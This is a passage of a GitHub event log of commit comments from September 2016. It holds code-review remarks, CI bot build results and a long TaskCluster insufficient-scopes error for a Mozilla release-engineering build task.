{"id":"4608152636","type":"CommitCommentEvent","actor":{"login":"estellecomment"},"repo":{"name":"medic/medic-gateway"},"payload":{"comment":{"id":19145168,"position":51,"line":51,"path":"src/main/java/medic/gateway/alert/GatewayEventLogFragment.java","commit_id":"3490e32183c6502c560ee4b3033fb7da7c0cd0aa","created_at":"2016-09-23T12:02:24Z","updated_at":"2016-09-23T12:02:24Z","body":"`LogAdapter` and `LogLoader` (or `LogCursorAdapter` and `LogCursorLoader`) are my favorites. But you're the decision owner. "}},"created_at":"2016-09-23T12:02:24Z"}
{"id":"4608153981","type":"CommitCommentEvent","actor":{"login":"ptomin"},"repo":{"name":"uxmal/reko"},"payload":{"comment":{"id":19145174,"position":7,"line":48,"path":"subjects/PE-x86/VCExeSample/VCExeSample.c","commit_id":"a4a80c463872735f58ad1f189eaa48ee1674bc80","created_at":"2016-09-23T12:02:45Z","updated_at":"2016-09-23T12:02:45Z","body":"> Do you think you isolate this code and reproduce it in a unit test? \r\n\r\nI'll try to create unit test this evening."}},"created_at":"2016-09-23T12:02:45Z"}
{"id":"4608155122","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19145177,"position":null,"line":null,"path":null,"commit_id":"ccd612644ab6152ee06e47d057638bcd010714cc","created_at":"2016-09-23T12:03:01Z","updated_at":"2016-09-23T12:03:01Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1143](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14107&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-23T12:03:01Z"}
{"id":"4608155599","type":"CommitCommentEvent","actor":{"login":"rbubley"},"repo":{"name":"gae-init/gae-init"},"payload":{"comment":{"id":19145178,"position":33,"line":55,"path":"main/task.py","commit_id":"b88f2566acb4d86f546d1c79b828afaccdc8b26c","created_at":"2016-09-23T12:03:08Z","updated_at":"2016-09-23T12:03:08Z","body":"Oy! I need to spend some quality time with my editor settings!\nOn Fri, 23 Sep 2016 at 12:19, Serg Baburin <notifications@github.com> wrote:\n\n> =True,\n> )\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/gae-init/gae-init/commit/b88f2566acb4d86f546d1c79b828afaccdc8b26c#commitcomment-19144694>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AC4r01zM-QQZkAT6Jwvo7r2tyzaE8D2pks5qs7XFgaJpZM4KE32R>\n> .\n>\n-- \n\n\n\n\n\n*Russ Bubley*\n\n[image: Logo]\n\n\n\nInnovation in Social Investment\n\n    russ@i-for-change.co.uk\n\n    020 8815 0864 <+442088150864>\n\n*www.i-for-change.co.uk <http://www.i-for-change.co.uk/>*\n\n    0797 119 5656 <+447971195656>\n\nFollow us, like us.\n\n[image: linkedin] <http://www.linkedin.com/company/i-for-change/>   [image:\ntwitter] <https://twitter.com/iforchangeUK>   [image: facebook]\n<https://www.facebook.com/iforchangeUK>\n\n\n\n*Get blog posts in your inbox\n<http://www.i-for-change.co.uk/subscribe.html>*\n\n\nThis electronic communication is issued by i for change ltd., an Appointed\nRepresentative of Sturgeon Ventures LLP who is authorised and regulated by\nthe Financial Conduct Authority FRN # 452811. Any unauthorised use or\ninterception of this e-mail is illegal. If this e-mail is not intended for\nyou, you may not copy, distribute or disclose the contents to anyone. Save\nfor bona fide company matters, i for change ltd. does not accept any\nresponsibility for the opinions expressed in this e-mail. This\ncommunication is made available in the United Kingdom to professional\nclients and eligible counterparties as defined by the FCA.\n\nPersons who have received this communication should not rely upon it alone,\nand should seek professional advice if necessary. Any attachments contained\nin this email are in accordance with COBS 2.4 in the FCA Handbook on\nwww.FCA.org.uk <http://www.fca.org.uk/> (reliance on others). i for change\nltd. is taking a proportionate approach and has verified the attachments\nand other email content to the best of our ability. However if you consider\nthe contents (including attachments) are material to the formation of a\ncontract and / or you are otherwise relying upon its accuracy, you may wish\nto request a copy to be sent by normal mail.\n\ni for change ltd. cannot guarantee the accuracy or completeness of this\ne-mail as information could be intercepted, corrupted, lost, destroyed, and\nincomplete and / or arrive late. It could contain viruses when transmitted\nover the public networks. If you suspect that the e-mail may have been\nintercepted or amended, please contact the sender. This message has been\nscanned for viruses. You should virus-check attachments before opening.\nWhen addressed to i for change ltd.’s clients, any opinion or advice\ncontained in this e-mail is subject to i for change ltd.’s terms of\nbusiness. This e-mail is provided for informational purposes only and\nshould not be construed as a solicitation or offer to buy or sell\nsecurities or related financial instruments.\n\nRegistered Office: i for change ltd., 19 Rookfield Avenue, London, N10 3TS\n"}},"created_at":"2016-09-23T12:03:08Z"}
{"id":"4608155723","type":"CommitCommentEvent","actor":{"login":"justnoxx"},"repo":{"name":"electric-cloud/EC-WebSphere"},"payload":{"comment":{"id":19145179,"position":82,"line":82,"path":"src/main/resources/project/server/mapSharedLibrary.pl","commit_id":"c52156136c75dbbab31581cd6025ae4e2bb89de0","created_at":"2016-09-23T12:03:10Z","updated_at":"2016-09-23T12:03:10Z","body":"Update it at https://github.com/electric-cloud/EC-WebSphere/pull/74\r\nPlease, confirm that it works for you."}},"created_at":"2016-09-23T12:03:10Z"}
{"id":"4608159786","type":"CommitCommentEvent","actor":{"login":"KingsDevelopment"},"repo":{"name":"cstefanache/angular2-img-cropper"},"payload":{"comment":{"id":19145190,"position":null,"line":null,"path":null,"commit_id":"d9d33299b90c74c55d051eecfe52ef8d240c0c82","created_at":"2016-09-23T12:04:10Z","updated_at":"2016-09-23T12:04:10Z","body":"Tested it using github as npm source, should work out fine (:"}},"created_at":"2016-09-23T12:04:10Z"}
{"id":"4608163478","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19145203,"position":null,"line":null,"path":null,"commit_id":"e362caafb26c216e47caa4e7c25f88d0f90fa06c","created_at":"2016-09-23T12:05:05Z","updated_at":"2016-09-23T12:05:05Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35971/testReport/) for this commit**"}},"created_at":"2016-09-23T12:05:05Z"}
{"id":"4608164479","type":"CommitCommentEvent","actor":{"login":"osoner"},"repo":{"name":"Countly/countly-server"},"payload":{"comment":{"id":19145206,"position":32,"line":45,"path":"plugins/slipping-away/frontend/public/javascripts/countly.views.js","commit_id":"11ad8a144d7d3d50b9eb0b3ff7c225db2598e8f2","created_at":"2016-09-23T12:05:20Z","updated_at":"2016-09-23T12:05:20Z","body":"@waiterZen I changed the for loop here because it couldn't be minified like this. Please try to use standard JS code and try the minification (e.g. countly upgrade) for your plugins."}},"created_at":"2016-09-23T12:05:20Z"}
{"id":"4608166207","type":"CommitCommentEvent","actor":{"login":"joeante"},"repo":{"name":"Unity-Technologies/ScriptableRenderLoop"},"payload":{"comment":{"id":19145212,"position":4,"line":37,"path":"Assets/ScriptableRenderLoop/HDRenderLoop/Shaders/TemplateDisneyGGX.hlsl","commit_id":"612518def7834c72188a772fd8183798990fc9c6","created_at":"2016-09-23T12:05:45Z","updated_at":"2016-09-23T12:05:45Z","body":"My understanding was that we should change them to float3?"}},"created_at":"2016-09-23T12:05:45Z"}
{"id":"4608166442","type":"CommitCommentEvent","actor":{"login":"faddat"},"repo":{"name":"faddat/orangepipc-linux"},"payload":{"comment":{"id":19145214,"position":null,"line":null,"path":null,"commit_id":"6cd3641c8003e0bde3a46922c802ad8bdd4617f5","created_at":"2016-09-23T12:05:49Z","updated_at":"2016-09-23T12:05:49Z","body":"it's the 3.x vs 4.x thing.  No boot.cmd needed for 4.x kernels using u-boot.  but the script could well be broken I have to update it often against mainline.  What's your goal?"}},"created_at":"2016-09-23T12:05:49Z"}
{"id":"4608167305","type":"CommitCommentEvent","actor":{"login":"enlight3d"},"repo":{"name":"hbldh/pymetawear"},"payload":{"comment":{"id":19145215,"position":null,"line":null,"path":null,"commit_id":"ebca753c07410b4411528fb6725ffb765ac27fda","created_at":"2016-09-23T12:06:03Z","updated_at":"2016-09-23T12:06:03Z","body":"readme.md needs to be updated with temp module in table as implemented then !"}},"created_at":"2016-09-23T12:06:03Z"}
{"id":"4608167974","type":"CommitCommentEvent","actor":{"login":"KingsDevelopment"},"repo":{"name":"cstefanache/angular2-img-cropper"},"payload":{"comment":{"id":19145217,"position":null,"line":null,"path":null,"commit_id":"d9d33299b90c74c55d051eecfe52ef8d240c0c82","created_at":"2016-09-23T12:06:13Z","updated_at":"2016-09-23T12:06:13Z","body":"I recommend to create a release (npm wise), because people will need this upgraded when they upgrade to the new official release version.\r\n\r\nIn the mean time, you could give me or someone else access to manage this project."}},"created_at":"2016-09-23T12:06:13Z"}
{"id":"4608168041","type":"CommitCommentEvent","actor":{"login":"ORNis"},"repo":{"name":"ORNis/openMVG"},"payload":{"comment":{"id":19145218,"position":5,"line":15,"path":"src/openMVG/features/regions.hpp","commit_id":"b975d01f269e38a05ec96ae765f3f0321584ec0f","created_at":"2016-09-23T12:06:14Z","updated_at":"2016-09-23T12:06:14Z","body":" @pmoulon inline bool ApplyH_AndCheckOrientation( const Mat3 &H, double &x, double &y ) is in src/openMVG/image/image_warping.hpp maybe it make more sense to move this function in something like openMVG/geometry/projective_tranformation.hpp "}},"created_at":"2016-09-23T12:06:14Z"}
{"id":"4608168325","type":"CommitCommentEvent","actor":{"login":"fiza200"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":19145219,"position":null,"line":null,"path":null,"commit_id":"06e637fc4a3b47fbff4d732a53547fe887f92c97","created_at":"2016-09-23T12:06:18Z","updated_at":"2016-09-23T12:06:18Z","body":"thanks for sharing it.\r\nhttp://www.pakistanjobs.pk/"}},"created_at":"2016-09-23T12:06:18Z"}
{"id":"4608174122","type":"CommitCommentEvent","actor":{"login":"ORNis"},"repo":{"name":"ORNis/openMVG"},"payload":{"comment":{"id":19145227,"position":50,"line":228,"path":"src/software/SfM/main_ComputeFeatures.cpp","commit_id":"b975d01f269e38a05ec96ae765f3f0321584ec0f","created_at":"2016-09-23T12:07:51Z","updated_at":"2016-09-23T12:07:51Z","body":"@pmoulon I disable the serialization for now in order to make a real life test, I still need to figure out how to handle serialization in decorators."}},"created_at":"2016-09-23T12:07:51Z"}
{"id":"4608176777","type":"CommitCommentEvent","actor":{"login":"KalamaresFTW"},"repo":{"name":"KalamaresFTW/PracticasDS"},"payload":{"comment":{"id":19145235,"position":42,"line":50,"path":"DS-34-11-B1/src/ejercicio1/Collatz.java","commit_id":"2adfafa040a8adb9141fa0f294301ef1fd7ca478","created_at":"2016-09-23T12:08:32Z","updated_at":"2016-09-23T12:08:32Z","body":"mima, que chea de hostias vas a levar chaval..."}},"created_at":"2016-09-23T12:08:32Z"}
{"id":"4608177500","type":"CommitCommentEvent","actor":{"login":"ORNis"},"repo":{"name":"ORNis/openMVG"},"payload":{"comment":{"id":19145237,"position":58,"line":285,"path":"src/openMVG/features/regions.hpp","commit_id":"b975d01f269e38a05ec96ae765f3f0321584ec0f","created_at":"2016-09-23T12:08:43Z","updated_at":"2016-09-23T12:08:43Z","body":"@pmoulon code is duplicated, it's not really bad but it's not really DRY :)\r\n"}},"created_at":"2016-09-23T12:08:43Z"}
{"id":"4608177849","type":"CommitCommentEvent","actor":{"login":"fiza200"},"repo":{"name":"vanilla/vanilla"},"payload":{"comment":{"id":19145240,"position":null,"line":null,"path":null,"commit_id":"93083aef8587626308366ce4a0666733f7d9f2fb","created_at":"2016-09-23T12:08:49Z","updated_at":"2016-09-23T12:08:49Z","body":"can I apply it in this site?\r\nhttp://www.pakistanjobs.pk/"}},"created_at":"2016-09-23T12:08:49Z"}
{"id":"4608178838","type":"CommitCommentEvent","actor":{"login":"esorio"},"repo":{"name":"cstefanache/angular2-img-cropper"},"payload":{"comment":{"id":19145241,"position":null,"line":null,"path":null,"commit_id":"d9d33299b90c74c55d051eecfe52ef8d240c0c82","created_at":"2016-09-23T12:09:05Z","updated_at":"2016-09-23T12:09:05Z","body":"Tested, now is working! thanks @KingsDevelopment "}},"created_at":"2016-09-23T12:09:05Z"}
{"id":"4608179561","type":"CommitCommentEvent","actor":{"login":"pmoulon"},"repo":{"name":"ORNis/openMVG"},"payload":{"comment":{"id":19145242,"position":7,"line":7,"path":"src/openMVG/features/image_describer_homography_decorator.hpp","commit_id":"b975d01f269e38a05ec96ae765f3f0321584ec0f","created_at":"2016-09-23T12:09:16Z","updated_at":"2016-09-23T12:09:16Z","body":"OPENMVG_FEATURES_HOMOFRAPHY_IMAGE_DESCRIBER_HPP => OPENMVG_FEATURES_HOMOGRAPHY_DECORATOR_IMAGE_DESCRIBER_HPP"}},"created_at":"2016-09-23T12:09:16Z"}
{"id":"4608184239","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19145255,"position":null,"line":null,"path":null,"commit_id":"4124ec970b7a8377b581837506eb15d56cac02a8","created_at":"2016-09-23T12:10:30Z","updated_at":"2016-09-23T12:10:30Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35972/testReport/) for this commit**"}},"created_at":"2016-09-23T12:10:30Z"}
{"id":"4608185025","type":"CommitCommentEvent","actor":{"login":"ORNis"},"repo":{"name":"ORNis/openMVG"},"payload":{"comment":{"id":19145257,"position":7,"line":7,"path":"src/openMVG/features/image_describer_homography_decorator.hpp","commit_id":"b975d01f269e38a05ec96ae765f3f0321584ec0f","created_at":"2016-09-23T12:10:42Z","updated_at":"2016-09-23T12:10:42Z","body":"oups :+1: "}},"created_at":"2016-09-23T12:10:42Z"}
{"id":"4608189383","type":"CommitCommentEvent","actor":{"login":"massmediagroup-11"},"repo":{"name":"massmediagroup-11/ruby_on_rails_code_presentation"},"payload":{"comment":{"id":19145264,"position":34,"line":20,"path":"app/controllers/backoffice/users_controller.rb","commit_id":"81ed442c15ac17ea9ac11e27ab4902c02b49294a","created_at":"2016-09-23T12:11:48Z","updated_at":"2016-09-23T12:11:48Z","body":"```ruby\r\nredirect_to(action: 'show', id: @user.id) && return if @user.save\r\n\r\nrender :new\r\n```"}},"created_at":"2016-09-23T12:11:48Z"}
{"id":"4608193279","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19145277,"position":null,"line":null,"path":null,"commit_id":"ccd612644ab6152ee06e47d057638bcd010714cc","created_at":"2016-09-23T12:12:50Z","updated_at":"2016-09-23T12:12:50Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1143](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14107&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 245, ignored: 3 Build time: 00:09:49"}},"created_at":"2016-09-23T12:12:50Z"}
{"id":"4608194074","type":"CommitCommentEvent","actor":{"login":"dawnsmell"},"repo":{"name":"dawnsmell/ReviewTest"},"payload":{"comment":{"id":19145279,"position":null,"line":null,"path":null,"commit_id":"17a5880557206ae10c1a8f6cbf989bf806e5a09b","created_at":"2016-09-23T12:13:03Z","updated_at":"2016-09-23T12:13:03Z","body":"코드가 깔끔하게 아주 보기 좋네요."}},"created_at":"2016-09-23T12:13:03Z"}
{"id":"4608194756","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":19145280,"position":null,"line":null,"path":null,"commit_id":"4a4916ef9a32a1533c9f4ba0d336d9ecd0c7c8a0","created_at":"2016-09-23T12:13:13Z","updated_at":"2016-09-23T12:13:13Z","body":"Submitting the task to TaskCluster failed. You didn't give the task-graph scopes allowing it define tasks on the queue.Details:\n\n```js\n[\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"MIfdG5ErQmal640QBEkeiw\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_frontend\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_frontend\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_frontend\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_frontend\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.opened\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"4a4916ef9a32a1533c9f4ba0d336d9ecd0c7c8a0\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T12:13:12.981Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T12:13:12.981Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"MzkVMxuRS9-w0yD0urG5OA\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T12:13:12.981Z\\\"\\n}\\n  time:     2016-09-23T12:13:13.130Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"MIfdG5ErQmal640QBEkeiw\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_frontend\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_frontend\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_frontend\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_frontend\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.opened\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"4a4916ef9a32a1533c9f4ba0d336d9ecd0c7c8a0\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T12:13:12.981Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T12:13:12.981Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"MzkVMxuRS9-w0yD0urG5OA\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T12:13:12.981Z\\\"\\n}\\n  time:     2016-09-23T12:13:13.130Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"MIfdG5ErQmal640QBEkeiw\"\n                },\n                \"payload\": {\n                    \"metadata\": {\n                        \"name\": \"releng_frontend\",\n                        \"description\": \"Test, build and deploy releng_frontend\",\n                        \"owner\": \"bastien@nextcairn.com\",\n                        \"source\": \"https://github.com/mozilla-releng/services/tree/master/src/releng_frontend\"\n                    },\n                    \"scopes\": [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"payload\": {\n                        \"maxRunTime\": 7200,\n                        \"image\": \"nixos/nix:latest\",\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"env\": {\n                            \"APP\": \"releng_frontend\",\n                            \"TASKCLUSTER_SECRETS\": \"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\",\n                            \"GITHUB_EVENT\": \"pull_request.opened\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 59,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/mozilla-releng/services.git\",\n                            \"GITHUB_BASE_USER\": \"mozilla-releng\",\n                            \"GITHUB_BASE_SHA\": \"c70e3321a3d31f95036588c14dfafc3a0ea581f3\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/La0/mozilla-relengapi.git\",\n                            \"GITHUB_HEAD_USER\": \"La0\",\n                            \"GITHUB_HEAD_SHA\": \"4a4916ef9a32a1533c9f4ba0d336d9ecd0c7c8a0\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"bastien@nextcairn.com\"\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\"\n                        ]\n                    },\n                    \"created\": \"2016-09-23T12:13:12.981Z\",\n                    \"deadline\": \"2016-09-24T12:13:12.981Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"MzkVMxuRS9-w0yD0urG5OA\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-24T12:13:12.981Z\"\n                },\n                \"time\": \"2016-09-23T12:13:13.130Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/services:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  